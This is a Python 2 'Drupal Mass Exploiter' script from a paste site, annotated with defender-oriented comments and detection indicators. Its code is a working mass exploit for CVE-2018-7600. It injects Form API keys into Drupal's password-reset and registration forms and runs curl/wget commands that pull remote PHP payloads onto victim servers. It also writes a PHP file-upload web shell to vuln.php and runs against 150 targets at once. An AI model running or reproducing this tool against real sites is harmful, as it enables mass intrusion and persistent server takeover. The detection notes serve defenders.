ToKeiChun

Drupal Mass Exploiter Priv8 (by izocin)

Sep 24th, 2020 (edited)
  1. #!/usr/bin/python
  2.  
  3. # Coded By izocin
  4. # Turkey
  5.  
  6. import requests, re, urllib2, os, sys, codecs,binascii, json                   
  7. from multiprocessing.dummy import Pool                         
  8. from time import time as timer 
  9. import time
  10. from random import sample as rand
  11. from Queue import Queue                    
  12. from platform import system
  13. from colorama import Fore                              
  14. from colorama import Style                             
  15. from pprint import pprint                              
  16. from colorama import init                                              
  17. init(autoreset=True)
      # colorama setup: with autoreset=True the colour/style codes are reset after each print.
  18. requests.urllib3.disable_warnings()                                
      # Silences urllib3 warnings for the whole process. That includes the warning urllib3
      # emits for requests sent with verify=False, which sitebul() uses further down.
  19.                                                            
  20. ####### Colors   ######
  21. def progressbar(it, prefix = "", size = 1000):
          # Generator: yields each item of `it` and redraws a one-line text progress bar on
          # stdout after every item.
          #   it     - a sized collection (len() is called on it)
          #   prefix - text printed in front of the bar
          #   size   - bar width in characters
          # It is not called anywhere else in this listing.
          # NOTE(review): an empty `it` gives count == 0, so the first _show(0) divides by zero.
  22.     count = len(it)
  23.     def _show(_i):
              # x is the number of filled cells; "\r" moves the cursor back so the next
              # call overwrites the same terminal line.
  24.         x = int(size*_i/count)
  25.         sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count))
  26.         sys.stdout.flush()
  27.     _show(0)
  28.     for i, item in enumerate(it):
  29.         yield item
  30.         _show(i+1)
  31.     sys.stdout.write("\n")
  32.     sys.stdout.flush()
  33. toolbar_width = 30
      # Cosmetic start-up animation only: prints an empty 30-character bar, backspaces over
      # it, then writes one "*" every 0.01 s. No network or file activity happens here.
  34.  
  35. sys.stdout.write(":%s:" % (" " * toolbar_width))
  36. sys.stdout.flush()
  37. sys.stdout.write("\b" * (toolbar_width+1))
  38.  
  39. for i in xrange(toolbar_width):
  40.     time.sleep(0.01)
  41.  
  42.     sys.stdout.write("*")
  43.     sys.stdout.flush()
  44.  
  45. sys.stdout.write("\n") 
  46.  
  47. fr  =   Fore.RED                                           
      # Short aliases for colorama colour (Fore.*) and style (Style.*) codes. They are
      # interpolated into the status lines that sitebul() prints; fr and fg are passed
      # last in the "Failed" and "upload" messages respectively.
  48. fc  =   Fore.CYAN                                          
  49. fw  =   Fore.WHITE                                         
  50. fg  =   Fore.GREEN                                         
  51. sd  =   Style.DIM                                          
  52. sn  =   Style.NORMAL                                       
  53. sb  =   Style.BRIGHT                                       
  54.  
  55. #######################
  56. try:
          # Target list: the file named by the first command-line argument is decoded as
          # ASCII (undecodable bytes are dropped) and split into one entry per line.
          # Main() later hands every entry to sitebul() as a base URL, with no validation.
  57.     with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
  58.         ooo = f.read().splitlines()
  59. except IOError:
  60.     pass
  61. ooo = list((ooo))
  62.  
  63.  
  64. if system() == 'Linux':
              # Clears the terminal; only done when platform.system() reports Linux.
  65.         os.system('clear')
  66.  
  67.  
  68.  
  69. shell = """GIF89a <?php echo 'M3 2018'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" Joomla="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done');       </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>"""
      # `shell` is a PHP file-upload form. It starts with the text "GIF89a", prints the
      # marker 'M3 2018' plus php_uname() and the working directory, and passes any
      # uploaded file to move_uploaded_file() under the client-supplied file name.
      # sitebul() embeds this string in `payload2`, whose command writes it to vuln.php.
      # Detection notes for defenders: look in web roots for files that begin with
      # "GIF89a" followed by "<?php", for the literal 'M3 2018', and for multipart POSTs
      # with a field named "uploads" sent to an unexpected .php file.
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. def sitebul(url):
          # Reviewer annotation for defenders. The code is unchanged; only comments were added.
          #
          # For one base URL this function sends a fixed series of unauthenticated POSTs
          # that place Form API render-array keys (#post_render, #markup, #type,
          # #lazy_builder) into request parameters of Drupal's password-reset form
          # (?q=user/password, followed by ?q=file/ajax/name/#value/<form_build_id>) and
          # of the registration form (/user/register?element_parents=...&ajax_form=1
          # &_wrapper_format=drupal_ajax). One status line below names CVE-2018-7600.
          # The Drupal core fix for that CVE (advisory SA-CORE-2018-002) strips request
          # keys that begin with '#', so patched sites never see the injected keys.
          # After each attempt the function GETs a file under the base URL and looks
          # for a marker string to decide whether the injected command ran.
          #
          # Indicators visible in this listing:
          #   - files next to index.php: dick.php, payload.php, m3.htm, vuln.htm, vuln.php
          #   - marker strings: 'M3', 'M3sicth', 'izocin', 'Spider Project', 'Vuln!!'
          #   - curl/wget run by the web-server user towards raw.githubusercontent.com
          #   - User-Agent 'Mozilla 5.0', or a fixed Chrome/65.0.3325.181 string
          #   - query-string or body parameter names containing '[#'
          #   - local result files on the operator's side: Shell.txt, Shells.txt,
          #     index.txt, drupal-index.txt
  77.    
  78.    
  79.     try:   
  80.  
  81.  
  82.         # 22 . rev
  83.  
  84.  
              # Drupal 7 request shape: the query string targets the password-reset form and
              # carries name[#post_render][]=passthru with a name[#markup] shell command that
              # pulls a remote PHP file. Detection: q=user/password together with '[#' in a
              # parameter name.
  85.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php', 'name[#type]':'markup'}
  86.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  87.         r = requests.post(url, data=post_params, params=get_params)
  88.        
  89.        
              # The hidden form_build_id is read from the response and replayed in a second
              # POST to the file/ajax path.
  90.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  91.         if m:
  92.             found = m.group(1)
  93.        
  94.         get_params = {'q':'file/ajax/name/#value/' + found}
  95.         post_params = {'form_build_id':found}
  96.         r = requests.post(url, data=post_params, params=get_params)
  97.  
              # Success probe: a GET for the dropped file right after the two POSTs. The same
              # client requesting /dick.php seconds after q=user/password is a useful
              # access-log correlation.
  98.         lib = requests.get(url+'/dick.php')
  99.        
  100.        
  101.         if re.findall("M3", lib.content):
  102.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
                   # Hits are appended to a local results file.
  103.             open('Shell.txt', 'a').write(url+'/dick.php'+'\n')
  104.             sys.exit()
  105.        
  106.         else:
  107.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
               # The same request pair and probe are sent a second time.
  108.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php', 'name[#type]':'markup'}
  109.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  110.         r = requests.post(url, data=post_params, params=get_params)
  111.        
  112.        
  113.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  114.         if m:
  115.             found = m.group(1)
  116.        
  117.         get_params = {'q':'file/ajax/name/#value/' + found}
  118.         post_params = {'form_build_id':found}
  119.         r = requests.post(url, data=post_params, params=get_params)
  120.  
  121.         lib = requests.get(url+'/dick.php')
  122.        
  123.        
  124.         if re.findall("M3", lib.content):
  125.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
  126.             open('Shell.txt', 'a').write(url+'/dick.php'+'\n')
  127.             sys.exit()
  128.         else:
  129.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)              
  130.  
  131.         # 22 . rev
  132.  
  133.  
               # Marker-file variant: the injected command only writes the text 'M3sicth' to
               # m3.htm, and the probe expects it at <url>/m3.htm. A stray m3.htm holding that
               # string is evidence that an injected command ran on the host.
  134.         Index_page = "echo 'M3sicth' > m3.htm"
  135.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  136.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  137.         r = requests.post(url, data=post_params, params=get_params)
  138.        
  139.        
  140.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  141.         if m:
  142.             found = m.group(1)
  143.        
  144.         get_params = {'q':'file/ajax/name/#value/' + found}
  145.         post_params = {'form_build_id':found}
  146.         r = requests.post(url, data=post_params, params=get_params)
  147.  
  148.         lib = requests.get(url+'/m3.htm')
  149.        
  150.        
  151.         if re.findall("M3sicth", lib.content):
  152.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  153.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  154.  
  155.         else:
  156.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  157.  
  158.        
               # Same Drupal 7 sequence with a second remote file (payload.php from another
               # GitHub repository); the probe looks for the marker 'Spider Project'.
  159.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php', 'name[#type]':'markup'}
  160.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  161.         r = requests.post(url, data=post_params, params=get_params)
  162.        
  163.        
  164.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  165.         if m:
  166.             found = m.group(1)
  167.        
  168.         get_params = {'q':'file/ajax/name/#value/' + found}
  169.         post_params = {'form_build_id':found}
  170.         r = requests.post(url, data=post_params, params=get_params)
  171.  
  172.         lib = requests.get(url+'/payload.php')
  173.        
  174.        
  175.         if re.findall("Spider Project", lib.content):
  176.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 V2     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
  177.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  178.             sys.exit()
  179.         else:
  180.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 V2    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)            
  181.  
  182.         # 22 . rev
  183.  
  184.  
               # Marker-file variant again, this time writing 'izocin' to vuln.htm.
  185.         Index_page = "echo 'izocin' > vuln.htm"
  186.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  187.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  188.         r = requests.post(url, data=post_params, params=get_params)
  189.        
  190.        
  191.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  192.         if m:
  193.             found = m.group(1)
  194.        
  195.         get_params = {'q':'file/ajax/name/#value/' + found}
  196.         post_params = {'form_build_id':found}
  197.         r = requests.post(url, data=post_params, params=get_params)
  198.  
  199.         lib = requests.get(url+'/vuln.htm')
  200.        
  201.        
  202.         if re.findall("izocin", lib.content):
  203.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 2    {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  204.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  205.  
  206.         else:
  207.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 2 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  208.  
               # Drupal 8 request shape from here on: a POST to /user/register with
               # element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax,
               # whose body names exec as mail[#post_render][]. verify=False turns off TLS
               # certificate checks for these requests.
               # Detection: POSTs to /user/register carrying ajax_form=1 and body keys that
               # contain '[#'.
  209.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php && curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  210.         headers = {'User-Agent': 'Mozilla 5.0'}            
  211.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  212.         if 'M3sicth' in requests.get(url+'/payload.php', verify=False, headers=headers).text:
  213.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  214.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  215.             sys.exit() 
  216.         else:
  217.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  218.  
  219.  
  220.            
  221.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  222.         headers = {'User-Agent': 'Mozilla 5.0'}            
  223.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  224.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  225.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  226.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  227.             sys.exit() 
  228.         else:
  229.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  230.  
               # Variant that uses #lazy_builder keys on the mail element instead of #post_render.
  231.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail["a"][#lazy_builder][0]': 'exec', 'mail["a"][#lazy_builder][1][]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  232.         headers = {'User-Agent': 'Mozilla 5.0'}            
  233.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  234.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  235.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  236.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  237.             sys.exit() 
  238.         else:
  239.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  240.  
               # Variant on the timezone element. The request path contains a literal
               # "%3F" where the other requests use "?", so "/user/register%3Felement_parents"
               # is a distinctive string to search for in access logs.
  241.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'timezone[a][#lazy_builder][]': 'exec', 'timezone[a][#lazy_builder][][]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  242.         headers = {'User-Agent': 'Mozilla 5.0'}            
  243.         r = requests.post(url+ '/user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  244.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  245.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  246.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  247.             sys.exit() 
  248.         else:
  249.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)         
  250.  
  251.                
               # Same #post_render request, sent with a fixed desktop-Chrome User-Agent string.
  252.         r = requests.post(url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php"})
  253.         if 'M3sicth' in requests.get(url+'/payload.php').text:
  254.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  255.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  256.             sys.exit() 
  257.         else:
  258.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  259.  
               # `payload` writes a short text marker to an .htm file; `payload2` writes the PHP
               # upload form held in the module-level `shell` string to vuln.php.
  260.         headers = {'User-Agent': 'Mozilla 5.0'}
  261.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  262.                    'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> m3.htm'}
  263.         payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + shell + '"> vuln.php'}          
  264.         ar = requests.post(url+'/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, timeout=5)
  265.         if 'Vuln!!' in requests.get(url+'/vuln.htm', headers=headers).text:
  266.             print '[{}Drupal]: {} {}           ====> {}{} CVE-2018-7600 RCE V8 index   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  267.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  268.             sys.exit()
  269.            
  270.         rr = requests.post(url+ '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload2)
  271.         if 'M3sicth' in requests.get(url+'/vuln.php', headers=headers).text:
  272.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  273.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  274.             sys.exit()         
  275.         else:
  276.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)   
  277.            
  278.        
  279.         # 22 . rev
  280.  
  281.  
               # Everything from here to the end of the try block repeats the sequences above,
               # using the second remote file (payload.php, marker 'Spider Project') and the
               # vuln.htm / drupal-index.txt / Shells.txt names.
  282.         Index_page = "echo 'izocin' > vuln.htm"
  283.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  284.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  285.         r = requests.post(url, data=post_params, params=get_params)
  286.        
  287.        
  288.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  289.         if m:
  290.             found = m.group(1)
  291.        
  292.         get_params = {'q':'file/ajax/name/#value/' + found}
  293.         post_params = {'form_build_id':found}
  294.         r = requests.post(url, data=post_params, params=get_params)
  295.  
  296.         lib = requests.get(url+'/vuln.htm')
  297.        
  298.        
  299.         if re.findall("izocin", lib.content):
  300.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  301.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  302.  
  303.         else:
  304.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  305.            
  306.  
  307.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  308.         headers = {'User-Agent': 'Mozilla 5.0'}            
  309.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  310.         if 'Spider Project' in requests.get(url+'/payload.php', verify=False, headers=headers).text:
  311.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  312.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  313.             sys.exit() 
  314.         else:
  315.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  316.  
  317.  
  318.            
  319.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  320.         headers = {'User-Agent': 'Mozilla 5.0'}            
  321.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  322.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  323.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  324.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  325.             sys.exit() 
  326.         else:
  327.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  328.  
  329.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail["a"][#lazy_builder][0]': 'exec', 'mail["a"][#lazy_builder][1][]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  330.         headers = {'User-Agent': 'Mozilla 5.0'}            
  331.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  332.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  333.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  334.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  335.             sys.exit() 
  336.         else:
  337.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  338.  
  339.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'timezone[a][#lazy_builder][]': 'exec', 'timezone[a][#lazy_builder][][]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  340.         headers = {'User-Agent': 'Mozilla 5.0'}            
  341.         r = requests.post(url+ '/user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  342.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  343.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  344.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  345.             sys.exit() 
  346.         else:
  347.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)         
  348.  
  349.                
  350.         r = requests.post(url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php"})
  351.         if 'Spider Project' in requests.get(url+'/payload.php').text:
  352.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  353.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  354.             sys.exit() 
  355.         else:
  356.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  357.  
  358.         headers = {'User-Agent': 'Mozilla 5.0'}
  359.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  360.                    'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
  361.         payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + shell + '"> vuln.php'}          
  362.         ar = requests.post(url+'/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, timeout=5)
  363.         if 'Vuln!!' in requests.get(url+'/vuln.htm', headers=headers).text:
  364.             print '[{}Drupal]: {} {}           ====> {}{} CVE-2018-7600 RCE V8 index   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  365.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  366.             sys.exit()
  367.            
  368.         rr = requests.post(url+ '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload2)
  369.         if 'izocin' in requests.get(url+'/vuln.php', headers=headers).text:
  370.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  371.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  372.             sys.exit()         
  373.         else:
  374.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)   
  375.  
  376.            
           # Bare except: every error is swallowed, and so is the SystemExit raised by the
           # sys.exit() calls above, so a worker thread just stops handling this URL.
  377.     except:
  378.         pass
  379.        
  380.                
  381.                
  382.        
  383.  
  384.    
  385. def Main():
           # Runs sitebul() once for every entry of the module-level list `ooo` and prints
           # the elapsed wall-clock time. Takes no arguments and returns nothing.
  386.     try:
  387.        
  388.         start = timer()
               # `Pool` is multiprocessing.dummy.Pool, i.e. a thread pool: up to 150 URLs are
               # processed at the same time. Seen from one web server this looks like a short
               # burst of the POST/GET pairs that sitebul() sends, all from a single client.
  389.         ThreadPool = Pool(150)
  390.         Threads = ThreadPool.map(sitebul, ooo)
  391.         print('Time: ' + str(timer() - start) + ' seconds')
           # Bare except: any error raised while setting up or running the pool is discarded.
  392.     except:
  393.         pass
  394.  
  395.  
  396. if __name__ == '__main__':
           # Script entry point. The target file was already read at import time above,
           # so Main() only starts the thread pool.
  397.     Main()